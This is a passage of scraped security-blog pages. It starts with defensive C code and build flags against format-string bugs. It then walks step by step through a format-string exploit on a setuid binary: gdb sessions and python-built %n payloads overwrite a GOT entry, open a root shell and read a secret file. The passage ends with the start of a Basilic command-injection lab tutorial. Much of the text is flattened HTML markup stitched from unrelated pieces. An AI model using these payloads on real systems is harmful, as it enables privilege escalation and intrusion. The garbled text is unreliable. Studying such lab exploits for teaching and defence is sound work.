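    return n == (int)(plen + strlen(user_input))
        && strncmp(out, prefix, plen) == 0
        && strcmp(out + plen, user_input) == 0;
}

/* Count printf conversion directives in untrusted text. A password field
 * containing "%124$n" is a detection signal worth logging or alerting on;
 * it is not a substitute for the fixed-format fix above. */
int count_format_directives(const char *s) {
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* "%%" is an escaped literal percent sign */
            s++;
            continue;
        }
        count++;
    }
    return count;
}

/* Build-time defences that stop the GOT overwrite shown in this walkthrough
 * even if a printf(argv[1]) call survives review (gcc/glibc assumed):
 *   -Wformat -Wformat-security   warn on a non-literal format with no args
 *   -D_FORTIFY_SOURCE=2 -O2      glibc aborts on %n in a format string that
 *                                lives in writable memory (argv does)
 *   -Wl,-z,relro,-z,now          full RELRO: the GOT is remapped read-only
 *                                after the loader resolves every slot, so
 *                                the %n store to the putchar entry faults
 *                                instead of redirecting the call */
int main(int argc, char **argv) {
    char msg[256];
    /* constructed sample input when none is given on the command line */
    const char *input = argc > 1 ? argv[1] : "AAAABBBBC : %63329u%124$n";
    render_wrong_password(msg, sizeof msg, input);
    printf("%s\n", msg);
    printf("format directives seen in input: %d\n",
           count_format_directives(input));
    return 0;
}
```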
f76d in decimal is 63341, so we subtract 11 (the number of characters printed so far) and pad the rest with a field width. We'll use gdb to see what number we are actually trying to write:

    testuser@host:~$ ./app "AAAABBBB : %63330u%124\$x : %125\$x"
    Wrong password: AAAABBBB :
    322122294841414100 : 42424241
    testuser@host:~$ ./app "AAAABBBBC : %63330u%124\$x : %125\$x"
    Wrong password: AAAABBBBC :
    322122294841414141 : 42424242
    testuser@host:~$ gdb -q ./app
    Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
    (gdb) r "AAAABBBBC : %63330u%124\$n : %125\$x"
    Starting program: /home/testuser/app "AAAABBBBC : %63330u%124\$n : %125\$x"
    Wrong password: AAAABBBBC :
    Program received signal SIGSEGV, Segmentation fault.
    0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
    (gdb) x/i $eip
    => 0xb7ea19d4 <vfprintf+16244>: mov %edx,(%eax)
    (gdb) print/x $edx
    $1 = 0xf76e
    (gdb) r "AAAABBBBC : %63329u%124\$n : %125\$x"
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y
    Starting program: /home/testuser/app "AAAABBBBC : %63329u%124\$n : %125\$x"
    Wrong password: AAAABBBBC :
    Program received signal SIGSEGV, Segmentation fault.
    0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
    (gdb) x/i $eip
    => 0xb7ea19d4 <vfprintf+16244>: mov %edx,(%eax)
    (gdb) print/x $edx
    $2 = 0xf76d
    (gdb) print/x $eax
    $3 = 0x612f7265

So we have the right number for the bottom half. Now we need to figure out the top half. The problem is that under gdb the memory layout is slightly different: as you can see, it is not trying to write to 41414141. First we need to put the actual memory addresses we want in there and fix the alignment:

    (gdb) r "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"C : %63329u%124\$x : %125\$x\"")"
    Starting program: /home/testuser/app "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"C : %63329u%124\$x : %125\$x\"")"
    Wrong password: T�V��C :
    3221222900612f7265 : 54007070
    (gdb) r "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CC : %63329u%124\$x : %125\$x\"")"
    Starting program: /home/testuser/app "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CC : %63329u%124\$x : %125\$x\"")"
    Wrong password: T�V��CC :
    322122290070612f72 : 9a540070
    (gdb) r "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCC : %63329u%124\$x : %125\$x\"")"
    Starting program: /home/testuser/app "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCC : %63329u%124\$x : %125\$x\"")"
    Wrong password: T�V��CCCC :
    3221222900707061 : 8049a54
    [Inferior 1 (process 31783) exited with code 01]
    (gdb) r "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCC : %63329u%125\$x : %126\$x\"")"
    Starting program: /home/testuser/app "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCC : %63329u%125\$x : %126\$x\"")"
    Wrong password: T�V��CCCC :
    32212229008049a54 : 80049a56
    [Inferior 1 (process 31789) exited with code 01]

OK, we have our pointers aligned again. I've set the second address to `\x56\x9a\x04\x80` (or `80049a56`) because we want a fault to occur so we can see what values we are trying to write; the final payload will use `08049a56`, which is 2 bytes past the address we found in the GOT (`08049a54`), meaning this write supplies the second half of the memory address.

Let's get on with writing that last part:

    (gdb) r "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCC : %63329u%125\$n : %126\$n\"")"
    Starting program: /home/testuser/app "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCC : %63329u%125\$n : %126\$n\"")"
    Wrong password: T�V��CCCC :
    Program received signal SIGSEGV, Segmentation fault.
    0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
    (gdb) x/i $eip
    => 0xb7ea19d4 <vfprintf+16244>: mov %edx,(%eax)
    (gdb) print/x $edx
    $4 = 0xf773
    (gdb) print/x $eax
    $5 = 0x80049a56

So this is now writing to our 2nd address. We want bfff to be written there, but currently f773 is being written, which is higher than bfff, so we have to count up past it to 1bfff, whose low half is bfff: 1bfff - f773 = c88c, or 51340 in decimal. Let's try:

    (gdb) r "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCC : %63329u%125\$n : %51340u%126\$n\"")"
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y

    Starting program: /home/testuser/app "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCC : %63329u%125\$n : %51340u%126\$n\"")"
    Wrong password: T�V��CCCC :
    Program received signal SIGSEGV, Segmentation fault.
    0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
    (gdb) x/i $eip
    => 0xb7ea19d4 <vfprintf+16244>: mov %edx,(%eax)
    (gdb) print/x $edx
    $6 = 0xf770
    (gdb) print/x $eax
    $7 = 0x72657375

We seem to have lost our position again, so we will have to align the addresses once more:

    (gdb) r "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCC : %63329u%125\$x : %51340u%126\$x\"")"
    Starting program: /home/testuser/app "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCC : %63329u%125\$x : %51340u%126\$x\"")"
    Wrong password: T�V��CCCC :
    32212228967070612f
    [Inferior 1 (process 914) exited with code 01]
    (gdb) r "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCC : %63329u%125\$x : %51340u%127\$x\"")"
    Starting program: /home/testuser/app "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCC : %63329u%125\$x : %51340u%127\$x\"")"
    Wrong password: T�V��CCCC :
    322122289649a5400
    [Inferior 1 (process 920) exited with code 01]
    (gdb) r "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCCC : %63329u%125\$x : %51340u%127\$x\"")"
    Starting program: /home/testuser/app "$(python -c "print \"\x54\x9a\x04\x08\x56\x9a\x04\x80\" + \"CCCCC : %63329u%125\$x : %51340u%127\$x\"")"
    Wrong password: T�V��CCCCC :
    32212228968049a54
    [Inferior 1 (process 924) exited with code 01]

We've found the right place; now to make sure we are writing the right values:

    (gdb) r "$(python -c "print \"\x54\x9a\x40\x08\x56\x9a\x04\x80\" + \"CCCCC : %63329u%127\$n : %51340u%128\$n\"")"
    Starting program: /home/testuser/app "$(python -c "print \"\x54\x9a\x40\x08\x56\x9a\x04\x80\" + \"CCCCC : %63329u%127\$n : %51340u%128\$n\"")"
    Wrong password: T�V��CCCCC :
    Program received signal SIGSEGV, Segmentation fault.
    0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
    (gdb) x/i $eip
    => 0xb7ea19d4 <vfprintf+16244>: mov %edx,(%eax)
    (gdb) print /x $edx
    $8 = 0xf771
    (gdb) r "$(python -c "print \"\x54\x9a\x40\x08\x56\x9a\x04\x80\" + \"CCCCC : %63325u%127\$n : %51340u%128\$n\"")"
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y

    Starting program: /home/testuser/app "$(python -c "print \"\x54\x9a\x40\x08\x56\x9a\x04\x80\" + \"CCCCC : %63325u%127\$n : %51340u%128\$n\"")"
    Wrong password: T�V��CCCCC :
    Program received signal SIGSEGV, Segmentation fault.
    0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
    (gdb) x/i $eip
    => 0xb7ea19d4 <vfprintf+16244>: mov %edx,(%eax)
    (gdb) print /x $edx
    $9 = 0xf76d

And lastly, to make the second number correct:
class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print /x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"10/span span class="o"=/span 0x1bffc/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print 
\quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½οΏ½CCCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print /x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"11/span span class="o"=/span 0x1bfff/span span class="code-line"/code/pre/div /td/tr/table h2Exploiting The App/h2 pSo we have our values right, let's run it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span 
class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½CCCCC :/span/span span class="code-line"span class="go"process 956 is executing new program: /bin/bash/span/span span class="code-line"span class="gp"[email protected]:/home/testuser$/span/span span class="code-line"/code/pre/div /td/tr/table pCool, we got a shell but as we are running it in gdb and gdb hasn't got the setuid bit set its not running and root, with this knowledge let try to get this to work outside of gdb:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$n : %51343u%128\$n\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½CCCCC :/span/span span class="code-line"span class="go"Segmentation fault/span/span span class="code-line"/code/pre/div /td/tr/table pDidn't work, most likely our pointers aren't aligned again, so now to get them aligned:/p table 
class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$x : %51343u%128\$x\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½CCCCC :/span/span span class="code-line"span class="go"32212229443a204343/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCC : %63325u%127\$x : %51343u%125\$x\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½CCCCC :/span/span span class="code-line"span class="go"322122294449a5400/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCCC : %63325u%125\$x : %51343u%126\$x\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½CCCCCC :/span/span span class="code-line"span class="go"32212229448049a56/span/span span 
class="code-line"/code/pre/div /td/tr/table pThat looks ok, we added a 'C' so let's minus 1 from our padding and try:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app span class="s2"quot;/spanspan class="k"$(/spanpython -c span class="s2"quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x08\quot; + \quot;CCCCCC : %63324u%125\$n : %51343u%126\$n\quot;quot;/spanspan class="k")/spanspan class="s2"quot;/span/span span class="code-line"span class="go"Wrong password: TοΏ½VοΏ½CCCCCC :/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED! 
:-)/p pSo we've got root through a format string vulnerability./p pI just wanted to demonstrate the second format string vulnerability quickly:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"[email protected]:~$ /spanln -s app %x/span span class="code-line"span class="gp"[email protected]:~$ ./%/spanx/span span class="code-line"span class="go"Usage: ./bffff654 lt;passwordgt;/span/span span class="code-line"/code/pre/div /td/tr/table pThis is an interesting case, see if you can root it!/p h2Conclusion/h2 pInput that can be controlled by a user should never be trusted, this vulnerability could have been easily avoided by using the printf function with a static format string instead of passing user input as the first argument./p pThis was a very simple and obvious example of a format string vulnerability but they aren't always as easy to spot. I will likely write different examples in later tutorials./p pHappy Hacking :-)/p
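As an added example (not the tutorial's app or the author's code), here is the vulnerable pattern the conclusion describes beside its fix, plus a small check that counts the printf directives in an untrusted string and flags `%n`; it is run over the strings used in the session above. The function names are hypothetical.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern (hypothetical name): the untrusted string IS the format
 * string, so any '%' in it is interpreted as a directive: %x reads values off
 * the stack and %n writes to memory, which is what the tutorial abuses.
 * Behaviour is only defined when the input contains no '%'. */
static int echo_vulnerable(char *out, size_t n, const char *input)
{
    return snprintf(out, n, input);
}

/* Fixed pattern: a static format string; the input is only ever an argument,
 * so a '%' in it is copied literally and never interpreted. */
static int echo_fixed(char *out, size_t n, const char *input)
{
    return snprintf(out, n, "%s", input);
}

/* Count the printf directives in a string that is about to reach (or, in a
 * log, already reached) a format argument, and flag whether any of them is
 * %n. "%%" is a literal percent sign and is not counted. Hypothetical helper
 * for input validation or log scanning. */
static int count_directives(const char *s, bool *has_n)
{
    int count = 0;
    *has_n = false;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {          /* "%%": literal percent */
            p++;
            continue;
        }
        p++;
        /* skip flags, width, precision, length modifiers and positional "N$" */
        while (*p && strchr("0123456789$.#+- *'hlLqjzt", *p))
            p++;
        count++;
        if (*p == '\0')              /* dangling '%' at end of string */
            break;
        if (*p == 'n')
            *has_n = true;
    }
    return count;
}

int main(void)
{
    /* Constructed inputs: two format strings from the gdb session above,
     * a benign string with an escaped percent, and the argv[0] symlink name. */
    const char *samples[] = {
        "CCCC : %63329u%125$x : %51340u%126$x",
        "CCCCCC : %63324u%125$n : %51343u%126$n",
        "100%% done",
        "./%x",
    };
    char buf[128];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        bool has_n;
        int c = count_directives(samples[i], &has_n);
        echo_fixed(buf, sizeof buf, samples[i]);   /* always safe */
        printf("%-40s directives=%d %%n=%s -> \"%s\"\n", samples[i], c,
               has_n ? "yes" : "no", buf);
    }
    return 0;
}
```

Compiling with `-Wformat -Wformat-security` makes gcc warn on the non-literal format in `echo_vulnerable`, which is the cheapest way to catch this pattern in a code base.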

Command Injection in Basilic

2 June 2014 at 13:53
By: 0xe7
Here I will kick off my section on hacking web applications. This section will be more like the [reverse engineering](/categories/reverse-engineering.html) section, and not like the [x86-32 linux](/categories/x86-32-linux.html) or [linux kernel hacking](/categories/linux-kernel-hacking.html) sections, in that it will not be laid out in a course format and will instead consist of single tutorials for certain applications or situations.

This tutorial covers the first challenge in the `Pentesting Challenges` section of the [Pentester Academy](http://www.pentesteracademy.com) website. It is a [virtualbox](https://www.virtualbox.org/) [virtual machine](https://en.wikipedia.org/wiki/Virtual_machine) labelled `Command Injection ISO`. This virtual machine has been loaded with a number of web applications that are vulnerable to [command injection](https://www.owasp.org/index.php/Command_Injection).

## The Vulnerable App

After booting the virtual machine and finding out its IP address, the first thing to do is browse to that IP:

[Image: /assets/images/web-hacking/basilic-first-browse.png]

As we can see, there are a number of applications installed here. All of these are potential targets, but for this tutorial we'll just concentrate on Basilic.
As you can see, it is in `/basilic-1.5.14/`, so we can assume the target version is 1.5.14.

We can check this by browsing to the basilic-1.5.14 directory and looking at the source of the page (the image below is the source of that page as shown in [burpsuite](http://portswigger.net/burp/)):

[Image: /assets/images/web-hacking/basilic-first-source.png]

Now that we know the application and version number that we want to attack, we need to set it up on a machine that we control (if this were a real attack we wouldn't have control of the server hosting the web application, so we would download or buy the application and install it locally to pentest it).

## Setting Up The App

Browsing to the [Basilic website](http://artis.imag.fr/Software/Basilic/), we can see that 1.5.14 is the latest version:

[Image: /assets/images/web-hacking/basilic-website.png]

As my test server, I have installed a default [Debian](https://www.debian.org/) 7 (Wheezy). Ideally, in a real attack we would try to make our development environment as close as possible to the production one, so we would try to figure out which versions of [Ubuntu](http://www.ubuntu.com/), [PHP](http://www.php.net/manual/en/intro-whatis.php), [Apache](https://httpd.apache.org/) and [MySQL](https://www.mysql.com/) were running (as well as any other software involved) and set those up, but as the goal here is just to find a command injection vulnerability there is no need.

First we need [LAMP](https://en.wikipedia.org/wiki/LAMP_%28software_bundle%29) set up on there:

```
[email protected]:~# apt-get install apache2 mysql-server php5 php5-mysql
```
libaprutil1-dbd-sqlite3 (from .../libaprutil1-dbd-sqlite3_1.4.1-3_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libaprutil1-ldap./span/span span class="code-line"span class="go"Unpacking libaprutil1-ldap (from .../libaprutil1-ldap_1.4.1-3_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package apache2.2-bin./span/span span class="code-line"span class="go"Unpacking apache2.2-bin (from .../apache2.2-bin_2.2.22-13+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package apache2-utils./span/span span class="code-line"span class="go"Unpacking apache2-utils (from .../apache2-utils_2.2.22-13+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package apache2.2-common./span/span span class="code-line"span class="go"Unpacking apache2.2-common (from .../apache2.2-common_2.2.22-13+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package apache2-mpm-prefork./span/span span class="code-line"span class="go"Unpacking apache2-mpm-prefork (from .../apache2-mpm-prefork_2.2.22-13+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package libapache2-mod-php5./span/span span class="code-line"span class="go"Unpacking libapache2-mod-php5 (from .../libapache2-mod-php5_5.4.4-14+deb7u10_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package php5-mysql./span/span span class="code-line"span class="go"Unpacking php5-mysql (from .../php5-mysql_5.4.4-14+deb7u10_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package apache2./span/span span class="code-line"span class="go"Unpacking apache2 (from .../apache2_2.2.22-13+deb7u1_amd64.deb) .../span/span span class="code-line"span class="go"Selecting previously 
unselected package libhtml-template-perl./span/span span class="code-line"span class="go"Unpacking libhtml-template-perl (from .../libhtml-template-perl_2.91-1_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package mysql-server./span/span span class="code-line"span class="go"Unpacking mysql-server (from .../mysql-server_5.5.37-0+wheezy1_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package php5./span/span span class="code-line"span class="go"Unpacking php5 (from .../php5_5.4.4-14+deb7u10_all.deb) .../span/span span class="code-line"span class="go"Selecting previously unselected package ssl-cert./span/span span class="code-line"span class="go"Unpacking ssl-cert (from .../ssl-cert_1.0.32_all.deb) .../span/span span class="code-line"span class="go"Processing triggers for man-db .../span/span span class="code-line"span class="go"Setting up libaio1:amd64 (0.3.109-3) .../span/span span class="code-line"span class="go"Setting up libnet-daemon-perl (0.48-1) .../span/span span class="code-line"span class="go"Setting up libplrpc-perl (0.2020-2) .../span/span span class="code-line"span class="go"Setting up libdbi-perl (1.622-1) .../span/span span class="code-line"span class="go"Setting up libdbd-mysql-perl (4.021-1+b1) .../span/span span class="code-line"span class="go"Setting up mysql-client-5.5 (5.5.37-0+wheezy1) .../span/span span class="code-line"span class="go"Setting up mysql-server-core-5.5 (5.5.37-0+wheezy1) .../span/span span class="code-line"span class="go"Setting up mysql-server-5.5 (5.5.37-0+wheezy1) .../span/span span class="code-line"span class="go"[ ok ] Stopping MySQL database server: mysqld./span/span span class="code-line"span class="go"140602 16:38:39 [Warning] Using unique option prefix key_buffer instead of key_buffer_size is deprecated and will be removed in a future release. 
Please use the full name instead./span/span span class="code-line"span class="go"140602 16:38:39 [Warning] Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead./span/span span class="code-line"span class="go"140602 16:38:39 [Note] Plugin #39;FEDERATED#39; is disabled./span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: The InnoDB memory heap is disabled/span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: Mutexes and rw_locks use GCC atomic builtins/span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: Compressed tables use zlib 1.2.7/span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: Using Linux native AIO/span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: Initializing buffer pool, size = 128.0M/span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: Completed initialization of buffer pool/span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: highest supported file format is Barracuda./span/span span class="code-line"span class="go"140602 16:38:39 InnoDB: Waiting for the background threads to start/span/span span class="code-line"span class="go"140602 16:38:40 InnoDB: 5.5.37 started; log sequence number 1595675/span/span span class="code-line"span class="go"140602 16:38:40 InnoDB: Starting shutdown.../span/span span class="code-line"span class="go"140602 16:38:41 InnoDB: Shutdown completed; log sequence number 1595675/span/span span class="code-line"span class="go"[ ok ] Starting MySQL database server: mysqld ../span/span span class="code-line"span class="go"[info] Checking for tables which need an upgrade, are corrupt or were /span/span span class="code-line"span class="go"not closed cleanly../span/span span class="code-line"span class="go"Setting up php5-common (5.4.4-14+deb7u10) .../span/span span class="code-line"/span span 
class="code-line"span class="go"Creating config file /etc/php5/mods-available/pdo.ini with new version/span/span span class="code-line"span class="go"Setting up libonig2 (5.9.1-1) .../span/span span class="code-line"span class="go"Setting up libqdbm14 (1.8.78-2) .../span/span span class="code-line"span class="go"Setting up php5-cli (5.4.4-14+deb7u10) .../span/span span class="code-line"/span span class="code-line"span class="go"Creating config file /etc/php5/cli/php.ini with new version/span/span span class="code-line"span class="go"update-alternatives: using /usr/bin/php5 to provide /usr/bin/php (php) in auto mode/span/span span class="code-line"span class="go"Setting up libapr1 (1.4.6-3+deb7u1) .../span/span span class="code-line"span class="go"Setting up libaprutil1 (1.4.1-3) .../span/span span class="code-line"span class="go"Setting up libaprutil1-dbd-sqlite3 (1.4.1-3) .../span/span span class="code-line"span class="go"Setting up libaprutil1-ldap (1.4.1-3) .../span/span span class="code-line"span class="go"Setting up apache2.2-bin (2.2.22-13+deb7u1) .../span/span span class="code-line"span class="go"Setting up apache2-utils (2.2.22-13+deb7u1) .../span/span span class="code-line"span class="go"Setting up apache2.2-common (2.2.22-13+deb7u1) .../span/span span class="code-line"span class="go"Enabling site default./span/span span class="code-line"span class="go"Enabling module alias./span/span span class="code-line"span class="go"Enabling module autoindex./span/span span class="code-line"span class="go"Enabling module dir./span/span span class="code-line"span class="go"Enabling module env./span/span span class="code-line"span class="go"Enabling module mime./span/span span class="code-line"span class="go"Enabling module negotiation./span/span span class="code-line"span class="go"Enabling module setenvif./span/span span class="code-line"span class="go"Enabling module status./span/span span class="code-line"span class="go"Enabling module auth_basic./span/span span 
class="code-line"span class="go"Enabling module deflate./span/span span class="code-line"span class="go"Enabling module authz_default./span/span span class="code-line"span class="go"Enabling module authz_user./span/span span class="code-line"span class="go"Enabling module authz_groupfile./span/span span class="code-line"span class="go"Enabling module authn_file./span/span span class="code-line"span class="go"Enabling module authz_host./span/span span class="code-line"span class="go"Enabling module reqtimeout./span/span span class="code-line"span class="go"Setting up apache2-mpm-prefork (2.2.22-13+deb7u1) .../span/span span class="code-line"span class="go"[....] Starting web server: apache2apache2: Could not reliably determine the server#39;s fully qualified domain name, using 127.0.1.1 for ServerName/span/span span class="code-line"span class="go". ok /span/span span class="code-line"span class="go"Setting up libapache2-mod-php5 (5.4.4-14+deb7u10) .../span/span span class="code-line"/span span class="code-line"span class="go"Creating config file /etc/php5/apache2/php.ini with new version/span/span span class="code-line"span class="go"[....] Restarting web server: apache2apache2: Could not reliably determine the server#39;s fully qualified domain name, using 127.0.1.1 for ServerName/span/span span class="code-line"span class="go" ... waiting apache2: Could not reliably determine the server#39;s fully 